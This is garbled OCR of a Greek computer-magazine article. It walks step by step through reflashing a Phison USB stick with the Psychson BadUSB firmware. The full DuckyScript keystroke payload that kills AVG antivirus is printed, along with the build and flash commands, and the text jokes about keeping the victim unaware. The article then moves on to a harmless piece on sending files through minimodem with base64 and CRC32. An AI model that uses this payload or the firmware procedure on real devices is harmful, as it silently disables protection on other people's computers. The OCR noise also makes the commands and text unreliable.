λουµε να αποσυνδέσουµε τη συσκευἠ, να ανοίξουμε το σασί της, va εντοπἰσουµε 
Tov controller και να βραχυκυκλώσουμε τους ακροδέκτες 2 και 3. Αμέσως μετὰ -και 
µε τους ακροδέκτες βραχυκυκλωμένους, δηλαδἠ συνδεδεμένους µε κάποιο μικρὸ 
µεταλλικὀ αντικείµενο- πρέπει να συνδἐσουµε τη συσκευἠ στον υπολογιστή. Εφὀ- 
σον έχουμε συνδέσει τους σωστοὺς ακροδέκτες το λαμπάκι της συσκευής θα ανάψει 
και θα παραμείνει αναμμένο. Τότε θα μπορούμε να αποσυνδέσουµε τους δύο ακρο- 
δέκτες και να επιστρἐψουµε στο πληκτρολὀγιὀ µας. 
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Πριν τροποποιήσουµε οτιδήποτε, εἶναι φρόνιμο να πάρουμε Eva αντίγραφο του 
εργοστασιακού firmware. Αυτὸ γίνεται εὐκολα µε τη βοήθεια του πολυεργαλείου 
DriveCom και του burner image nou κατεβάσαμε νωρίτερα. Ξεκινάμε εγκαθιστὠντας 
το burner image: 


DriveCom.exe /drive=E /action=SendExecutable /burner=burner_image file 


Προφανώς, στη θέση Tou burner_image_file πρέπει va δώσουμε την πλήρη διαδρο- 
μή ως εκεἰ που αποθηκεύσαµε το burner image και φυσικὰ TO ὀνομα του αρχείου. 
Στη συνέχεια μπορούμε να αντιγράψουμµε To firmware της συσκευἠς ως εξἠς: 


DriveCom.exe /drive=E /action=DumpFirmware /firmware=firmware_backup_file 


Στη θέση Tou firmware_backup_file δίνουμε το επιθυμητό ὀνομα για το αντίγραφο 
που θα δημιουργηθεί. Όπως καταλαβαίνετε, αυτό το αρχείο πρέπει να TO φυλάξουμε 
κάπου και να µην το πειράξουµε καθὀλου. Αν στο μέλλον θελήσουμε να επαναφέἑ- 
poupe TN συσκευἠ στην αρχικἠ της κατάσταση, το εργοστασιακὀ firmware θα εἶναι 
anapaitnrto! 


To véo firmware 


τώρα μπορούμε ν' ασχοληθούμε µε TO χτίσιμο TOU τροποποιηµένου firmware. Ma 
αρχἠ αφήνουμε τον κατάλογο tools και µεταβαίνουμε στον κατάλογο µε τον πηγαίο 
κώδικα του νέου firmware: 


cd ..\firmware 


Ano εκεἰ εκτελούµε το build.bat, το οποίο πραγματοποιεί τις απαραίτητες µεταγλωτ- 
τίσεις και παράγει το véo firmware, καθὼς κι Eva νέο burner image. Το αρχείο µε το 
firmware ονομάζεται fw.bin ενώ το αρχείο µε το burner image εἶναι To bn.bin. Ta δύο 
αρχεία βρίσκονται στον κατάλογο bin, εντὸς του τρέχοντος καταλόγου (firmware). 
Εμεἰς εἶχαμε τοποθετήσει ολόκληρο το πακέτο του πηγαίου κὠδικα στη θέση c:\ 
psychson-master, επομένως το νέο firmware και το vo burner image τοποθετήθη- 
καν στη θέση c:\psychson-master\firmware\bin. 


Το τελικὀ βήμα για την ολοκλήρωση του firmware, εἶναι η προσθήκη ενὸς patch. O 
κώδικας του patch βρίσκεται στον ομώνυμο κατάλογο, ἐξω ano τον αυτὸν µε τον 
κώδικα του firmware. H προσθήκη Tou patch στο firmware εξασφαλίζει ὁτι ο npo- 
γραμματισμὸς της συσκευἠς θα εἶναι αδύνατος ano το software?. Ουσιαστικά, το εν 
λόγω patch αποτελεἰ µια δικλείδα ασφαλείας που καθιστά δύσκολο τον επαναπρο- 
γραμματισμὸ της συσκευής. H διαδικασία προσθήκης ξεκινά µε την αντιγραφἠ του 
firmware στον κατάλογο µε τον κὠδικα του patch. Εμεἰς δώσαμε KATI τέτοιο: 


copy c:\psychson-master\firmware\bin\fw.bin c:\psychson-master\patch\fw. bin 


Αμέσως μετά εκτελούμε και πάλι To script build.bat. Τώρα χρειάζεται λίγη προσοχή, 
για να µην μπερδευτούμε. Το προϊὀν αυτἠς της µεταγλώττισης θα ενσωματωθεί στο 
fw.bin και το εμπλουτισμένο firmware θα αποθηκευτεἰ σε Eva ομώνυμο αρχείο (fw. 
bin), μέσα στον κατάλογο bin. Τελικά, το firmware µε το ενσωματωμένο patch θα 
βρίσκεται στη θέση c:\psychson-master\patch\bin και θα ἐχει το ὀνομα fw.bin. 


2. Θα απαιτεῖται το κολπάκι µε το βραχυκύκλωμα των δύο ακροδεκτών, που περιγράψαµε και νωρίτερα. 
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H ύπουλη ευπάθεια tou BadUSB 
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wiae- DuckEncoder_2_6 3 


Home Share View 
| η X cut me S Χ =p B New item τ 2 [ZlOpen > HH Select an 
[55 Copy path - +=] Easy access ~ - À Edit Select none 


Copy Past Move Copy Delete Rename New Properties 


[a] Paste shortcut tor toy X folder & History ΒΕ Invert selection 


(9) ~ T J» DuckEncoder 2.63 


A Favorites Name Date modified Type Size 
ΕΕ Desktop I resources 12/4/2013 7:22PM File folder 
(IB Downloads LS encoder,jar 1 A Executable Jar File 57 KB 
IE Google Drive Å inject.bin 1 VLC media file (bi... 1KB 
E] Recent places |_| README 1 File 2KB 


LJ test. 10/23 Text Document 1ΚΒ 


«ᾷ Homegroup 


η This PC 
p -¥Bwlom\Desktop\DuckEncoder_2_6_3>java -jar encoder.jar -i te 


k Desktop 
P δι Encoder 2.6.3 
jocuments 
[$ Downloads Loading F 1 
Loading τ z 1 
p Music Loading La « Pi 3 1 
i Loading DuckyScript . 1 
Ẹ Pictures DuckyScript Complete..... 1 
B Videos 
i Local Disk (C:) iC:\Users\Cr@uvTom\Deskt op\DuckEncoder_2_6_3> 


=» MULTIBOOT (E:) 


a Network 


1 item selected 56.0 KB 


5 items 


Μόλις μετατρέψαμε TO αρχείο απλού κειμένου που αναφέρει τα 
keystrokes σε éva binary, κατάλληλο για ενσωμάτωση στο firmware 
της συσκευής. Η εργασία πραγματοποιήθηκε µε τη βοήθεια του προ- 

γράμματος DuckEncoder που εἶναι γραμμένο σε Java. 


Rubber Ducky 


Πριν ano µερικἀ χρόνια οι ἄνθρωποι του Hak5 εἶχαν λανσάρει µια συσκευή HE TO 
σχήμα και το μέγεθος Evoc USB flash drive, που ενώ διέθετε αποθηκευτικὀ χώρο και 
τον προσέφερε στο χρήστη κανονικά συμπεριφερόταν και σαν πληκτρολόγιο! Αυτή 
η διπρὀσωπη συσκευἠ µε το χαριτωμένο ὀνομα Rubber Ducky, ἐστελνε πατήματα 
πλήκτρων στο σύστημα και µε αυτὀν τον τρόπο μπορούσε να κάνει κυριολεκτικἁ τα 
πάντα. Το ποια πατήματα πλήκτρων θα αποστέλλονταν στο σύστημα το καθὀριζεο 
επιτιθέμενος, μέσα ano Eva αρχείο απλού κειμένου. E, λοιπόν, το νέο firmware nou 
φτιάξαμε προσφέρει παρόμοια λειτουργικότητα µε εκεῖνο το USB του Hak5. Πα τον 
προγραμματισμὀ πρέπει και να συντάξουμε κατάλληλα Eva αρχείο απλού κειµένου, 
σε κάθε γραμμή του οποίου περιγράφουµε Eva πλήκτρο. Αφού συντάξουµε το OXE- 
τικὀ κείμενο πρέπει να το μετατρέψουμε σε µια κατάλληλη µορφή, που επιτρέπε 
την EVOWHATWON του στο firmware. Αυτή η µετατροπἠ πραγματοποιείται µε τη Boñ- 
θεια του προγράµµατος ducky encoder. Περισσότερα yi' αυτὀ θα πούμε σε λἰγο. Ας 
δούμε τώρα το κείμενο µε τα πατήματα πλήκτρων που συντάξαμε εμείς, WOTE να 
πετύχουμε αυτό που εἶπαμε στο ξεκίνημα του άρθρου: την απενεργοποίηση του AVG 
antivirus. 
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DELAY 3000 
GUI r 
DELAY 1000 


STRING C:\Program 
Files (x86) \AVG\ 
AVG2014 


ENTER 
DELAY 1000 
TAB 

REPEAT 3 
DELAY 1000 
TAB 

REPEAT 12 
ENTER 

DOWN 
REPEAT 7 
ENTER 

TAB 

REPEAT 11 
DOWN 

DOWN 

TAB 

REPEAT 3 
ENTER 

TAB 

DOWN 

DOWN 

ENTER 

TAB 

ENTER 

ALT y 

TAB 

REPEAT 2 
ENTER 

ALT F4 
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Ὅπως βλέπετε, το αρχείο µε τα πατήματα πλήκτρων 
ἐχει εξαιρετικἀ απλἠ δομή. Εἶναι πανεύκολο να καταλά- 
βει κανεἰς ποια πατήματα πλήκτρων περιγράφονται στο 
παράδειγμά µας κι εξίσου εὐκολο να περιγράψει τα δικἀ 
του. Αφού συντάξουµε το αρχείο, το αποθηκεύουµε και 
κατεβάζουμε το ducky encoder. Πρόκειται για Eva πρὸ- 
γραμμα γραμμένο σε Java nou βρἰσκεται στη διεύθυνση 
http://bit.ly/duckenc263. Περιττό να πούμε ὁτι εφόσον το 
πρὀγραμμµα εἶναι γραμμένο σε Java, θα πρέπει να ἔχουμε 
εγκαταστήσει στο σύστημα και το runtime της γλὠσσας 
(http://java.com/en/download/manual.jsp). Πα τη perta- 
τροπἠ του απλού κειµένου µε τα πατήματα πλήκτρων σε 
binary, αρκεἰ να δώσουμε KATI τέτοιο: 


java -jar encoder -i keys.txt -ο inject.bin 


To keys.txt εἶναι το αρχείο nou εἶχαμε δημιουργήσει εμεὶς 
µε τα πατήματα, ενώ το inject.bin εἶναι το ὀνομα που επι- 
λέξαμε για το αρχεἰο που θα δηµιουργηθεἰ. 


Meta ano ὁλα αυτά απομένει να ενσωματώσουμε το 
inject.bin στο νέο firmware. Για το σκοπὀ αυτό αντιγρά- 
poupe τόσο το inject.bin ògo και το fw.bin (αυτό που 
προέκυψε µετά την προσθἠκη Tou patch) µέσα στον κα- 
τἄλογο EmbedPayload. Ακολούθως µεταβαίνουµε στο 
συγκεκριμένο κατάλογο και πληκτρολογούμε: 


EmbedPayload.exe inject.bin fw.bin 


Auto ἦταν ὁλο! Πλέον διαθέτουμε Eva firmware που εξα- 
πολύει επιθέσεις HID και εἶναι ἑτοιμο προς εγγραφή στο 
USB stick. Πριν όµως προχωρήσουμε πρέπει να σταθού- 
µε σε µια λεπτομέρεια: Το μέγιστο επιτρεπτὀ μέγεθος 
για το firmware εἶναι τα 200KB3. Επομένως, αν το ducky 
encoder δημιούργησε Eva μεγάλο αρχείο bin και το TEAIKO 
firmware ξεπερνά τα 200 ΚΒ, πρέπει να ἐχετε υπόψη σας 
ότι η εγγραφἠ στη συσκευἠ θα εἰναι αδύνατη. Σ' αυτή 
την περίπτωση οφεἰλετε να φτιάξετε Eva αρχείο text µε 
λιγότερα πατήματα πλήκτρων. Έτσι, θα δηµιουργηθεἰ Eva 
μικρότερο αρχείο inject.bin και κατ' επέκταση το TEAIKO 
firmware θα εἶναι επίσης μικρότερο. 


Εγγραφή στη συσκευἠ 


Κάπου εδώ φτάνουμε στο τέλος. Απὀ ὀλη την παραπάνω 
διαδικασία ¿xouv προκύψει δύο αρχεία: To νέο firmware 
και το αντίστοιχο burner image. Αφού τα μεταφέρουμε 
στον κατάλογο tools, μπορούμε να προχωρήσουμε στην 
εγκατἁστασή τους. Πα το σκοπὀ αυτό, εμεἰς δώσαμε τα 
ακόλουθα: 


3. Τουλάχιστον για την ώρα και για τους controllers που υποστηρίζονται. 


H ύπουλη εωπάθεια του BadUSB 
“ο” 


copy c:\psychson-master\firmware\bin\bn.bin c:\psychson-master\tools\bn.bin 
copy c:\psychson-master\embedpayload\fw.bin c:\psychson-master\tools\fw.bin 
cd c:\psychson-master\tools 

drivecom.exe /drive=E /action=SendFirmware /burner=bn.bin /firmware=fw.bin 


Τέλος - στ' αλήθεια! Meta ano την εγγραφἡ στο USB stick, εἰμαστε ἐτοιμοι να δοκι- 
µάσουμε το VEO µας ὀπλο. Περιττό να πούμε ὅτι όλες οι δοκιμὲς ἐγιναν σε δικὰ µας 
συστήματα και μόνο. Μόλις συνδἐσαµε το πειραγμένο USB στο σύστημα και μετὰ 
ano μόλις 3-4 δευτερὀλεπτα το AVG τερματίστηκε - χωρίς να παραπονεθεἰ κανένας! 
Αν ἡμασταν λίγο πιο novnpoi θα μπορούσαμε να φροντίσουμε για την επανεκκίνηση 
Tou antivirus μετά ano κάποιο χρονικὀ διάστηµα, WOTE TO θύμα να µην υποψιαστεί 
κάτι ;) 


Name Status 


[νεο AntiVirus Free Edition 2014 Snoozed 
il Windows Defender Off 


Update... Take action... 


ly Check virus protection ax 
Windows Defender and AVG AntiVirus Free Edition 2014 
are both turned off. Tap or click to see installed antivirus 


apps. 


7:45 PM 
10/23/2014 


H επίθεση στέφθηκε µε επιτυχία! Μέσα σε 3 δευτερόλεπτα απὀ τη σύνδεση του πειραγ- 
μένου USB stick, το antivirus τερματίστηκε μέχρι την επὀμενη επανεκκίνηση. 
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Επαναφορά συσκευἠς 


Σε περίπτωση που χρειαστεί να επαναφέρουµε τη συσκευἠ στην αρχικἠ της κατά- 
σταση, TO μόνο που EXOUHE να κάνουμε εἶναι να επαναλάβουµε τη διαδικασἰα της 
τελικής εγκατάστασης του firmware. Αυτή τη φορά, όμως, avTi να επιλέξουμε το 
δικὀ µας firmware και το αντίστοιχο burner image, πρέπει να χρησιμοποιήσουμε το 
εργοστασιακὀ firmware και To burner image nou εἶχαμε βρει και κατεβάσει στο EEki- 
νηµα της όλης διαδικασίας. Φυσικά, εξαιτίας του patch που προσθέσαµε στο δικό µας 
firmware, η συσκευἠ δεν θα τίθεται σε boot mode ano To software και θα πρέπει va 
καταφύγουµε στο βραχυκύκλωμα των ακροδεκτών 2 και 3 του controller. Eninpo- 
σθετα, αν για κάποιο λὀγο τα Windows δεν έχουν αποδώσει γράμμα στο USB stick, 
θα χρειαστεί να αντιστοιχίσουµε κάποιο χειροκίνητα. Πα TO σκοπὀ αυτό µεταβαίνου- 
µε στο Control Panel κι ακολουθούμε την εξής διαδρομή: Control Panel > System 
and Security > Administrative Tools > Computer Management. Ano εκεἰ επιλέγουμε 
το Disk Management, που υπάρχει κάτω αριστερἀ. Στο νέο παράθυρο nou εμφανί- 
ζεται επιλέγουμε τη συσκευἠ µας, κάνουμε δεξὶ κλικ κι επιλέγουμε TO Change Drive 
Letter and Paths. Ano εκεἰ μπορούμε να αντιστοιχίσουµε Eva γράμμα στο USB stick 
και να προχωρήσουμε στην εγγραφἡ του εργοστασιακού firmware. 


Θαυμαστό άγνωστο μέλλον... 


Οι υπεύθυνοι για την ευπάθεια που παρουσιάσαµε προσπάθησαν να επικοινωνήσουν 
µε την εταιρία Phison, προκειµένου να ενημερώσουν και να βρεθεί µια λύση. Ωστό- 
σο, η εταιρἰα υποστηρίζει OT! εἶναι δύσκολο να εκμεταλλευτεί κανεὶς τη συγκεκριµέ- 
νη ευπάθεια και οι επιθέσεις εἶναι αδύνατο να γενικευτούν. Καλὸ κι αυτό! Μιλάμε για 
επικίνδυνη ασχετοσύνη - ἡ για ασχετοσύνη επικίνδυνων διαστάσεων. Φαίνεται ὁτι 
οι επιθέσεις αυτού του εἰδους θα µας απασχολήσουν και στο μέλλον, ενώ εἶναι πολύ 
πιθανό να προκύψουν κι ἄλλα εἴδη τροποποιηµένων και κακόβουλων συσκευών. Πα 
την ώρα xouv ἠδη αρχίσει να συγκροτούνται κοινότητες που αναλύουν και παρου- 
σιάζουν νέους τύπους επίθεσης, εκμεταλλευόμενοι την ανύπαρκτη προστασία των 
memory controllers. Εξάλλου, το γεγονὸς OT! οι επιθέσεις που στηρἰζονται σ' GUTH 
την ευπάθεια εἶναι αόρατες, προσδίδει στο θέμα ξεχωριστὸ ενδιαφέρον. Έτσι ὁπως 
εξελίσσεται η κατάσταση, στο μέλλον δεν αποκλείεται να δούμε και application 
firewalls που θα μπλοκάρουν συγκεκριμένους τύπους συσκευών USB ἡ, πολύ περισ- 
σότερο, ολόκληρα κυκλώματα. 
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YOUR VERY OWN PLAYGROUND IN THE CLOUD. 
SECURE & GREEN. PAY AS YOU GO. 


Keep your data in Iceland and take advantage of GreenQ/oud's cloud 
services powered by abundant, stable and cost effective, clean energy 


e Up to 16 CPUs and 32gb RAM e Network separation at the 
in the KVM hypervisor hardware level 


O 


* 64-bit server image templates “ Dedicated IP address and 
including Ubuntu, Debian, reserved bandwidth 


FreeBSD, CentOS and more 
e EC2 compatible 


ComputeQloud™ * Built-in firewall 
Host & Manage e Instant scalability 
* In-browser noVNC client and ᾿ 
full root access via ssh e Online dashboard 


Ον 


e Triple-redundant storage . S3 compatible 
e Full encryption e Bucket websites 
StorageQloud™ e Sync across all platforms e Automatic load-balancing 


Backup & Share 


For more information visit our webiste: www.greenqloud.com 
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iPetros 


Όταν οι μηχανές αρχίζουν τη μουρμούρα [μέρος 2ο] 


Μετά το proof of concept της ηχητικής επικοινωνίας μεταξύ δύο υπολογιστών, 
έφτασε η WPA να προχωρήσουμε σε πιο σύνθετα σενάρια. Τι θα λέγατε να 
στήσουμε ἐναν χρήσιμο μηχανισμό επικοινωνίας; 


Όταν οι μηχανές αρχίζουν τη μουρμούρα [μέρας 2ο] 
Αα 


H πρώτη γνωριμία µε το minimodem που κάναμε στο άρθρο της σελἰδας 14, ἦταν 
πολύ διασκεδαστικἠ και εμπεριεἰχε µια γλυκειὰ νότα αναπόλησης του παρελθὀντος. 
H nxntikn διασύνδεση δύο υπολογιστών και η μεταφορά αρχείων απλού κειµένου 
αποτελούν σίγουρα δύο εντυπωσιακές κατακτήσεις. Ωστόσο, για τους 5-6 κατοίκους 
του πλανήτη που δεν γνωρίζουν πόσο ανήσυχοι εἰμαστε, πρἐπει να δηλώσουμε ὁτι 
καμία δύναμη δεν θα μπορούσε να μὰς σταματήσει εκεἰ. Πα να μπορέσουμε λοιπόν 
να ἐχουμε ἠσυχο ύπνο το βράδυ’, αποφασίσαμε να συνεχίσουμε την περιπἐτειά µας, 
προσπαθώντας να ENEKTEIVOUHE τη χρησιμότητα ὁσων εἰδαμε. 


Στο πρώτο μέρος του ἄρθρου, µε τη βοήθεια της ανακατεύθυνσης εξόδου καταφέ- 
pape να μεταφέρουμε αρχεία απλού κειµένου. Τι γίνεται ὁμως µε τα αρχεία τύπου 
binary; Αν δοκιµάσουµε να μεταφέρουμε Eva τέτοιο αρχείο µε τον τρόπο που παρου- 
σιάσαμε το αποτέλεσμα θα μάς απογοητεύσει, αφού θα λάβουμε κάτι ἄσχετο: Ένα 
αρχείο απλού κειμένου! Βλέπετε, το minimodem µπορεί να μεταδώσει µε επιτυχἰα 
μόνο ἑνα υποσύνολο των χαρακτήρων του πἰνακα ASCII. Αναρωτιἐστε πώς θα uno- 
ρέσουµε να ξεπεράσουμε αυτόν τον περιορισμό; H λύση στο πρὀβλημα εἶναι πολὺ 
παλιὰ και ἐγκειται σε µια µἐθοδο κωδικοποίησης που ονομάζεται Base64. 


Original Data H 
' Η i 


t t ' 
8-bit Bytes 01001000|01101001|00100001 


|{{ἑἑ}ἑἑἑἑἑἑἑ||ἑἑἑ444} 


6-bit Bytes 010010/000110/100100100001 


Transmitted Octets 00010010/00000110/00100100j00100001 


| | | | 
Encoded Data 5 k h 


Ένα διάγραμμα nou απεικονίζει τη µἐθοδο κωδικοποίησης κατά Base64. 


Base64 is your friend 


Σύμφωνα µε την εν λόγω κωδικοποίηση, µια συνεχἠς σειρἀ ano bits διαιρείται ap- 
χικά σε εξάδες. H αξία µιας εξἁδας bit κυμαίνεται ano το 0 ἑως To 26-1=63. Επομὲ- 
νως, οι πιθανὲς εξάδες που μπορούν να σχηματιστούν εἶναι ακριβώς 64. E, λοιπὀν, 
σε καθεµἰα απὀ αυτές τις εξάδες EXE! αντιστοιχηθεἰ ἑνας EKTUNWOINOG χαρακτήρας. 
Συγκεκριµένα, στις πρὠτες 26 εξἀδες EXOUV αντιστοιχηθεἰ τα κεφαλαία γράμματα 
του λατινικού αλφαβήτου (Α-Ζ), στις επόμενες 26 τα πεζἁ γράμματα (a-z), στις επὀ- 
µενες δέκα τα αριθμητικά ψηφία (0-9) και στις δύο που απομένουν οι χαρακτήρες + 
και /. Τέλος, σε µια ακολουθία ano bytes, το συνολικό πλήθος των bits εἶναι πάντοτε 


1. Το πόσο ἠσυχος µπορεί να εἶναι ο ύπνος μετά την ανακάλυψη του συγκεκριμένου παιχνιδιού, εἶναι ἑνα θέµα που χωράει µεγάλη αμφισβή- 
τηση ;) 
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ἀρτιο. Επομένως, αν κατὰ TOV τεμαχισμὀὸ των bits σε εξάδες περισσἐψουν κἀποια, 
θα εἶναι 2 ἡ 4 (εἶναι αδύνατο να περισσέψουν 3, 5 ἡ 7). Σε αυτή την περίπτωση, av 
υπολείπονται 2 bits για τη συμπλήρωση µιας εξἁδας μμ να, oes χαρακτήρας 
"=", ενῶ αν υπολείπονται 4 bits προστίθενται δύο χαρακτήρες ' 


Όπως καταλαβαίνετε, η κωδικοποίηση Base64 δέχεται ακολουθίες ano οποιουδήἠπο- 
τε εἶδους bytes και παράγει αλληλουχίες and εκτυπώσιµους χαρακτήρες. Επομένως, 
η χρήση της εἶναι ιδανικἠ για τη μετάδοση δεδοµένων µέσω του minimodem. Maps- 
μπιπτόντως, το Base64 αποτελεἰ και την de facto κωδικοποίηση για την αποστολἠ 
συνημμένων αρχείων µέσω email ;) 


Στα συστήματα Unix/Linux, η κωδικοποίηση δεδομένων κατά Base64 επιτυγχάνεται 
πανεύκολα µε τη βοήθεια του ομώνυμου εργαλείου: 


Save SaveAll 


ROLGOD LhewB3AP f /ANSOFeOEK LWVuSL Cwu6Sh6WLV7m4uUh4af j LBP33AfNYA/79S++vc+vr 
CkIJwmf79Lqwf yeJ+JPZSU+iXTPDICA9/u/vmAf //xuWKM2K2z fi3BuBSHHNybwc laWi60bQCAi 
CYTL26enpgtLibvn7viqCJaWlvn5+eLi4tZwKPmxKQ9vrsc7Blecv/7 1lgvvKOS9cAWwAFMd a2) 
iuSXBP//kpfL5NyJBzt j KHKS52Pzut+JWBwMUR8+PJ 4aGhpnX50eRPE2CsdPTOwUkWC9MePX19) 
wvXVqstCCNdJAvLEL9IJnCIrG4Y5xTyg3grRsMOmLASdLGvDw8P//eqHbSwhCd7MtA8QtCLooe 
rPz8/FGMtuBqFFAyMXPD1SYmee2zAn3K2v/9ZHKkt tSvb/ioHUxseueHAhMJ bUmDpkxKh+uix! 
bkqALIZdTqrg6saRRPe8X6gmBP79F JQVBLWQi2aGmth5B41qZVunxeBj C2anyCuPw60tKs9XC 
Evxfwl2syLhEETJ8ppBPJeihRne/3PKLSON1AdRaEYk1FJdmNXhoWcpKFxOXdE1JUY fP3X/E1 
ONzGsdK91Fukua9WL IWuvLuoiNRaJ i—rVHpwr IMxU+eUErVpaZLA2dH042F 1h3hKKH63zGy/é 
X/zjJ/m1Ftl4QaNaWlqp@chxFVOVr2pTUf3uY jhle/| bdg8GTZVq0oWCxyvDDAughc sU1D2Gy1 
OXfG1+i1Xql40EaTvLbHrDkoK5TT37d 7 τ; SNOT 
FiSkwvegEJ+fnjxcce2ZPMxMDLCvr ll 

lU4aF fGvU3/C3p4dBPDv9uHf7cyEGD6 # > B® Q Q Q δα B 
s/rBBt/Uy0rn42Foa35+e/34802dk4! 
AAj /ΑΡΘ.ΗΕ. οκ μασ 
LL+ReOLhOcl23dKRASmzp8+P5CK4s/U 
6HNUVS4gcNLCWbZq1blzT8VKrQmGUSa 
mO11EfRq9hnKXRoPgY/2WSXuMeIqj FO 
FmLKJEGOm23cOP+R8OwC6 rkmxRGHE, 
g8IESs038+gRYVMaG6mDFHL66PQKfBa 
JaJOYKLFpFEdVPISeJqEj TlmGij yYFh 
084j yUDVh4y rKUZj dv Lhgkkx+8Sx 
ο σος 
ρΡ8νΒΖύΒυ! 1ηΒΥ4Εαα1Π1ὐας(6ΑΘ611 
tcUUS8ghLiVDNDDrPy1+Axt8ulj m 
CPMo4LACo4awCz3mLtmtVlsYUY+44pY 
wwEMvSzTewgpOgycrMGidJCNF 14ΕΕΑΔΤ. 
cLi4HKL22mvroAMx8mQSTgWxIOFLL jprott ‘Qbba 

1FGHYEqs3G7 1ZApbd41 INKYY4BUJJJe9LiFuu/1y6rmMYArxw8tRhhbs8HFWFWrhnhyYQulcBh 
14534 fm8sZQMbUwwwQqQh4A0j StvILOJ 14bAxhDb2nmxR1gv4xUGOQgThDCqyGAeeWSzxNI5t 
ywe45JKPKdF4DbspbrjRiguSAAPh/xACAuGgEAkx/AOXOkBg/HLBB3awgwt 3uEcBfICOCdiAC 
ADoelwYb+ChikTMF9qYQpSlZrSOtYgD4wieMFnIARFYgD+lMdwQ+mMV2 fOCDLMDnNfuZ4gFnU 
//QgAmPwDoDDykUubnCI9ykQfkocFh8EcAc 1U0EMOW] EJ JwxgRdQYQx j OAUGOGGDMr YBHZELg 
1ΜΒΗΞΜΙ 1Η81Υ051 QQgkIwx8S6II / pADDGM6QbCSwATt: ccAQXaCEVnhBGNDZBQ1NAAXxZuECIpg 


Γκ 
line: 123/158 col:76 «5:0 INS TAB mode: Unix(LF) encoding: UTF-8 filetype: N... 


Στο προσκήνιο βλέπουμε το λογότυπο του δημοφιλούς browser, ενώ 
ακριβώς ano πίσω βλέπουμε τα περιεχόμενα του αρχείου της εικόνας, 
μετά την κωδικοποίηση κατά Base64. 


base64 input_file 


To εν λόγω πρόγραμμα επιστρἑφει τα αποτελἑσματά του στην τυπικἠ ἐξοδο (stdout). 
Επομένως, µε τη βοήθεια της ανακατεύθυνσης μπορούμε να πάρουμε Eva VEO ap- 
Χείο, το οποίο θα περιλαμβάνει τα κωδικοποιημένα περιεχόμενα του πρώτου: 


base64 input_file > output_file 


Τελικά, για την αποστολἠ ενὸς οποιουδήποτε εἰδους αρχείου µε το Minimodem, ap- 
Kei να επιστρατεύσουμε την κωδικοποίηση Base64 µε το ομώνυμο πρὀγραμμα. Στη 
συνέχεια, στον υπολογιστή-παραλήπτη θα πρέπει να προβούμε στην αποκωδικοποἰ- 
non, που επιτυγχάνεται πὰλι µε το ἰδιο πρὀγραμμµα και την παράμετρο -ᾱ. 
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Επικύρωση λήψεων 


Ἕνα ακόµα πρὀβλημµα που πρέπει να αντιμετωπίσουμε eivai AUTÒ της επικύρωσης 
των δεδομένων. Με απλά λόγια, της επιβεβαίωσης ὁτι λάβαμε τα σωστά δεδομµέ- 
να - ακριβώς αυτά nou στάλθηκαν, δηλαδἠ. Βλέπετε, σε Eva οποιοδήποτε κανάλι 
επικοινωνίας και ιδιαίτερα σε GUTO που σχηματίζεται µε το minimodem, υπάρχουν 
πολλά περιθώρια για σφάλματα μετάδοσης: Οἱ κάθε Eid0UG ηλεκτρομαγνητικὲς na- 
ρεμβολές, ο θόρυβος της γραμµἠς και οι πιθανὲς μικρὀ-διακοπὲς εἶναι ικανὲς να 
αλλοιώσουν τις τιμὲς αρκετών bits. Μια καλἠ μέθοδος ελέγχου της ορθότητας των 
δεδομένων προβλέπει τη χρήση αλγορίθμων κατακερματισμού, ὁπως εἶναι ο CRC32 
και ο MDS. Αυτοί οι δύο αλγόριθμοι εξετάζουν Eva σύνολο δεδοµένων και μετὰ ano 
πολύπλοκες μαθηματικὲς πράξεις παράγουν µια μοναδικὴ αναγνωριστικὴ τιμή. Αν 
τα δεδοµένα τροποποιηθούν ἐστω και κατὰ Eva bit, το παραγόμενο αναγνωριστικὀ 
διαφέρει σε μεγάλο βαθμό! Φυσικά, µιας και το αναγνωριστικὀ EXE] πεπερασμένο 
μήκος, εἶναι δυνατὀ δύο διαφορετικἀ σύνολα δεδομένων να παράγουν το ἰδιο ακρι- 
βὼς αποτέλεσμα. Κάτι τέτοιο, όμως, εἶναι εξαιρετικἀ απίθανο va συμβεἰ! H ἐξοδος 
του CRC32 ἐχει μήκος 32 bits, ενώ αυτὴ του MD5 ανέρχεται στα 128 bits, γεγονὸς 
που τον ανάγει σε ασφαλέστερη µἐθοδο πιστοποίησης. Δεν εἶναι ὁμως μόνο αυτή η 
διαφορὰ τους. O MD5 χρησιμοποιεὶ και κρυπτογραφικὲς μεθόδους, προκειµένου να 
απομακρύνει ακόµα περισσότερο το ενδεχόμενο µιας "σύγκρουσης", όπως ονομάζε- 
ται χαρακτηριστικἀ η παραγωγἠ της ἰδιας εξόδου and δύο διαφορετικὲς εισόδους. 
Πάντως, για τις δικὲς µας ανάγκες επαρκεἰ ο απλοϊκὸς και ταχύτερος CRC32. Εξἀλ- 
λου, η ηλικία του εἶναι περισσότερο ταιριαστἠ µε το εγχεἰρημά µας ;) 


‘Eva εργαλείο για την παραγωγἠ CRC32 hashes εἶναι το cksum και υπάρχει σε όλα τα 
συστήματα Unix/Linux. Το εν λόγω πρὀγραμμα δέχεται ως παράμετρο το ὀνομα του 
προς εξἐταση αρχείου κι εμφανίζει το αντίστοιχο hash: 


> cksum file.png 
2748509005 1573 file.png 


AUTO που σκεφτόμαστε, λοιπὸν, ἦταν η αυτόματη anooToAN Tou CRC32 hash για 
κάθε πακέτο δεδομένων. Εδώ, µε TOV OPO "πακέτο" δεν αναφερόμαστε σε µια μικρὴ 
ομάδα ano bytes, αλλά στο σύνολο των δεδοµένων που στέλνουµε µε µια σύνδε- 
ση του minimodem. Έτσι, ο παραλήπτης θα μπορούσε να υπολογίσει κι εκείνος TO 
CRC32 hash των δεδομένων και να το συγκρίνει µε TO hash που ἐλαβε. Αν οι δύο 
τιμὲς ταυτίζονται, θεωρούμε OT! τα δεδομένα μεταφέρθηκαν µε επιτυχία. 


Το δικὀ µας πρωτόκολλο 


Νομίζουμε ὁτι μετά απὸ ὁσα αναφέραμε ἑφτασε η WPA να τυποποιήσουμε τη µετα- 
φορὰ αρχείων µέσω του minimodem, σχεδιάζοντας το δικὀ µας πρωτόκολλο! Κατ' 
αρχάς, πἐρα ano ὁσα εἰδαμε, θεωρήσαμε λογικό να εκπέμπεται το ὀνομα αλλά και 
το μέγεθος του εκάστοτε αρχείου. Κάνοντας κάτι τέτοιο, η αντιγραφἠ θα πραγµα- 
τοποιεἰται ολοκληρωμένα και σωστά, ενώ ο παραλήπτης θα µπορεί να εκτιμήσει και 
το χρόνο άφιξης του αρχείου. Συνοψίζοντας, για την ολοκληρωμένη αποστολἠ ενὸς 
